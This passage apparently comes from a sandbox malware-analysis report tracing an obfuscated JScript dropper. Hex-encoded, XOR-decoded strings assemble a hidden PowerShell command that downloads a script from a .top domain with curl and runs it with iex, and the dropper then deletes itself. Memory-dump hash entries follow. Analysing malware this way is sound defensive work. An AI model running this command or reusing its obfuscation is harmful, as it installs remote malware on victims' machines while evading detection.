                                                                                                                                          • parseInt("1086",16) ➔ 4230
                                                                                                                                          • parseInt("1097",16) ➔ 4247
                                                                                                                                          • parseInt("108c",16) ➔ 4236
                                                                                                                                          • parseInt("1095",16) ➔ 4245
                                                                                                                                          • parseInt("1091",16) ➔ 4241
                                                                                                                                          • parseInt("10cb",16) ➔ 4299
                                                                                                                                          • parseInt("10b6",16) ➔ 4278
                                                                                                                                          • parseInt("108d",16) ➔ 4237
                                                                                                                                          24
                                                                                                                                          eVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR ++;
                                                                                                                                            25
                                                                                                                                            }
                                                                                                                                              26
                                                                                                                                              return hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOL;
                                                                                                                                                27
                                                                                                                                                } ( ) ) ) ;
                                                                                                                                                  28
                                                                                                                                                  function IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() {
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                  29
                                                                                                                                                  var qSYKFGcvTwdXx2khH9916Et8A1R9zrCb2kfgDbjJxvfv8mJA3zKcqYqHC = [ "16c27", "16c38", "16c20", "16c32", "16c25", "16c24", "16c3f", "16c32", "16c3b", "16c3b", "16c77", "16c7a", "16c39", "16c38", "16c27", "16c25", "16c38", "16c31", "16c3e", "16c3b", "16c32", "16c77", "16c7a", "16c32", "16c2f", "16c32", "16c34", "16c22", "16c23", "16c3e", "16c38", "16c39", "16c27", "16c38", "16c3b", "16c3e", "16c34", "16c2e", "16c77", "16c35", "16c2e", "16c27", "16c36", "16c24", "16c24", "16c77", "16c7a", "16c00", "16c3e", "16c39", "16c33", "16c38", "16c20", "16c04", "16c23", "16c2e", "16c3b", "16c32", "16c77", "16c3f", "16c3e", "16c33", "16c33", "16c32", "16c39", "16c77", "16c7a", "16c34", "16c77", "16c75", "16c34", "16c22", "16c25", "16c3b", "16c77", "16c7a", "16c22", "16c24", "16c32", "16c35", "16c77", "16c70" ];
                                                                                                                                                    30
                                                                                                                                                    return qSYKFGcvTwdXx2khH9916Et8A1R9zrCb2kfgDbjJxvfv8mJA3zKcqYqHC;
                                                                                                                                                      31
                                                                                                                                                      }
                                                                                                                                                        32
                                                                                                                                                        qSYKFGcvTwdXx2khH9916Et8A1R9zrCb2kfgDbjJxvfv8mJA3zKcqYqHC.Run (
                                                                                                                                                        • Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"") ➔ 0
                                                                                                                                                        33
                                                                                                                                                        function () {
                                                                                                                                                        • () ➔ "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb '"
                                                                                                                                                        • () ➔ "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb '"
                                                                                                                                                        34
                                                                                                                                                        var JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM = '';
                                                                                                                                                          35
                                                                                                                                                          var qSYKFGcvTwdXx2khH9916Et8A1R9zrCb2kfgDbjJxvfv8mJA3zKcqYqHCeVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR = IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr ( ).length;
                                                                                                                                                          • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                          36
                                                                                                                                                          for ( var JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM2134dfss = 0 ; JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM2134dfss < qSYKFGcvTwdXx2khH9916Et8A1R9zrCb2kfgDbjJxvfv8mJA3zKcqYqHCeVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR ; JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM2134dfss ++ )
                                                                                                                                                            37
                                                                                                                                                            {
                                                                                                                                                              38
                                                                                                                                                              JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM += String.fromCharCode ( parseInt ( IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr ( ) [JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM2134dfss], 0.25 * 8 * 2 * 2 * 0.5 * 4 ) ^ ( 11.25 * 8 * 1000 + 9.375 * 320 + 12.5 * 16 + 3.5 * 20 + 1 ) );
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c27",16) ➔ 93223
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c38",16) ➔ 93240
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c20",16) ➔ 93216
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c32",16) ➔ 93234
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c25",16) ➔ 93221
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c24",16) ➔ 93220
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c3f",16) ➔ 93247
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c32",16) ➔ 93234
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c3b",16) ➔ 93243
                                                                                                                                                              • IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                              • parseInt("16c3b",16) ➔ 93243
                                                                                                                                                              39
                                                                                                                                                              }
                                                                                                                                                                40
                                                                                                                                                                return JEWbaJ4iuapjUIDPxzRak543cimiv3L3z27gidRWZXhQbVUaKn5YHoyRzT1GLX8iVocuFFVitiLM;
                                                                                                                                                                  41
                                                                                                                                                                  } ( ) + hKho2Me14ZuxGIoWVi3HsOc ( ) + "' | i" + String.fromCharCode ( parseInt ( ( ( 20 * 4 * 10 ) ^ ( ( 100 + 73 ) * 5 ) ), 2 * 2 * 4 ) ) + "x\"" ) ;
                                                                                                                                                                    42
                                                                                                                                                                    var eVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                                                                                                                                                    • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                                                                    43
                                                                                                                                                                    eVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR.DeleteFile ( WScript.ScriptFullName );
                                                                                                                                                                    • DeleteFile("C:\Users\jones\Desktop\7hCWDvuinz.js") ➔ undefined
                                                                                                                                                                    Reset < >
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1963961159.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9baa0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fc34b22ad181041da38c07c12a842b5f8e5414da5e3a3f623c8fd484ebe139cd
                                                                                                                                                                      • Instruction ID: bf2808d1c12cddb9ae793675652ab09daeb986745fe74d78a0e435c409c24e14
                                                                                                                                                                      • Opcode Fuzzy Hash: fc34b22ad181041da38c07c12a842b5f8e5414da5e3a3f623c8fd484ebe139cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A515822B0D64A0FE319B76CAC659E47B91DF9637670402FBD18DCB0A3D915A847C391
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1964298570.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9bb70000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b54038c1aa88a52daa048f6284f33a48eb63798ef74d07d2626d69997c9dc6c8
                                                                                                                                                                      • Instruction ID: 7835b7623ce26237fa6f4fbd04cbc7482a4292c06ec25fb6ddefc485c698c59a
                                                                                                                                                                      • Opcode Fuzzy Hash: b54038c1aa88a52daa048f6284f33a48eb63798ef74d07d2626d69997c9dc6c8
                                                                                                                                                                      • Instruction Fuzzy Hash: AA311671B0E94D4FEBA4E79854A19BCB791FF59314F1801FEC04EC75E7DA15A8018380
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1964298570.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9bb70000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d1b6353d894cdb2e8557da77cb9edfedb0088be9c62ccf9bdbc26edb292c7615
                                                                                                                                                                      • Instruction ID: faab6a2024d56d33c107c8ce8658e99525887d183d9dbf4667a43030f0d3fcb0
                                                                                                                                                                      • Opcode Fuzzy Hash: d1b6353d894cdb2e8557da77cb9edfedb0088be9c62ccf9bdbc26edb292c7615
                                                                                                                                                                      • Instruction Fuzzy Hash: FF110671B0F6898FEB64DAD840A05ACB791FF05314F5540BEC14ECB4E7CA25AC418340
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1963961159.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9baa0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                      • Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45